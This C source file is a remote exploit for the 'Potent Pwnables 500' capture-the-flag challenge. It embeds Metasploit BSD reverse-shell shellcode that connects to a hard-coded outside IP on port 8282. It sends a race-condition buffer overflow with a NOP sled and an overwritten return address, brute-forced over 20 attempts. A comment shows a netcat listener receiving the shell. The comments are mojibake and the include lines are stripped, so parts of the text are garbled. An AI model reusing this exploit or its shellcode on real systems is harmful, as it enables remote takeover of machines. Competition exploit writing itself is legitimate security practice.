/* ** ** 0x82-dogfight_pwnage500 - Potent Pwnables 500 remote exploit by x82 ** ** exploit: -- ** [x82@x0x x82]$ ./0x82-dogfight_pwnage500 quals07 12345 ** ** Potent Pwnables 500 remote exploit by x82 ** ** [+] random port: 32743 ** [+] default brute-force count: 20 ** [*] exploit end. ** ** [x82@x0x x82]$ ** -- ** result: -- ** [x82@x0x x82]$ nc -l -p 8282 ** whoami ** pwnage500 ** exit ** -- ** */ #include #include #include #include #include #include unsigned char scode[] = /* bsd_ia32_reverse - LHOST=221.154.133.30 LPORT=8282 Size=92 Encoder=PexFnstenvSub http://metasploit.com */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x29\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0b" "\xe2\x2e\xc3\x83\xeb\xfc\xe2\xf4\x61\x83\x76\x5a\x59\xa0\x7c\x81" "\x59\x8a\xf3\x59\x8e\xfc\xe3\x43\x63\xf2\x2c\xe3\x51\x6b\xcf\xa9" "\x1b\xb3\x7e\x92\x9c\x88\x4c\x9b\xc6\x62\x44\xc1\x52\x52\x74\x92" "\x5c\xb3\xe3\x43\x42\x9b\xd8\x93\x63\xcd\x01\xb0\x63\x8a\x01\xa1" "\x62\x8c\xa7\x20\x5b\xb6\x7d\x90\xbb\xd9\xe3\x43"; int random_port=0; unsigned char buf[2000]; int setsock(char *host,int port){ struct hostent *se; struct sockaddr_in saddr; int sock; int i; se=gethostbyname(host); if(se==NULL){ return -1; } sock=socket(AF_INET,SOCK_STREAM,0); if(sock==-1){ return -1; } saddr.sin_family=AF_INET; saddr.sin_port=htons(port); saddr.sin_addr=*((struct in_addr *)se->h_addr); bzero(&(saddr.sin_zero),8); i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); if(i==-1){ return -1; } return sock; } int first_connect_12345(char *host,int port){ int sock; memset((char *)buf,0,sizeof(buf)); sock=setsock(host,port); buf[0]='0'; buf[1]='x'; recv(sock,buf+2,sizeof(buf)-1,0); random_port=strtoul(buf,0,0); return sock; } int first_send(int sock){ memset((char *)buf,0,sizeof(buf)); memset((char *)buf,'x',0x500); buf[499]=0; /* strlen()À» ³Ñ±â±â À§ÇØ */ send(sock,buf,strlen(buf),0); return sock; } int second_send(int sock){ int i; memset((char *)buf,0,sizeof(buf)); memset((char *)buf,0,0x500); memset((char *)buf,'x',520); memcpy(buf+4,scode,strlen(scode)); i=520; *(long *)&buf[i]=0x41414141; /* frame pointer */ i+=4; *(long *)&buf[i]=0x0804c604; /* return address */ i+=4; *(long *)&buf[i]=0x0; /* eax°¡ ¸Á°¡Á®¼­, ÀÌÀü±îÁö copy. */ i+=4; /* ÀÌ ºÎºÐ ¶§¹®¿¡ return-into-libc ±â¹ýÀ¸·Î´Â ¾ÈµÊ */ send(sock,buf,i,0); return sock; } int main(int argc,char *argv[]){ int sock_num0; int sock_num1; int sock_num2; int count=0; printf("\nPotent Pwnables 500 remote exploit by x82\n\n"); if(argc<3){ printf("Usage: %s [host] [port]\n\n",argv[0]); exit(-1); } sock_num0=(int)first_connect_12345(argv[1],atoi(argv[2])); printf(" [+] random port: %d\n",random_port); #define DEF_COUNT 20 printf(" [+] default brute-force count: %d\n",DEF_COUNT); for(count=0;count<(DEF_COUNT);count++) { /* ù ¹ø° ¾²·¹µå Á¢¼Ó */ sock_num1=(int)setsock(argv[1],random_port); /* µÎ ¹ø° ¾²·¹µå Á¢¼Ó */ sock_num2=(int)setsock(argv[1],random_port); (int)first_send(sock_num1); (int)second_send(sock_num2); memset((char *)buf,0,sizeof(buf)); recv(sock_num2,buf,sizeof(buf)-1,0); //printf("%s\n",buf); close(sock_num2); usleep(1000); memset((char *)buf,0,sizeof(buf)); recv(sock_num1,buf,sizeof(buf)-1,0); //printf("%s\n",buf); close(sock_num1); } close(sock_num0); printf(" [*] exploit end.\n\n"); exit(-1); } /* eoc */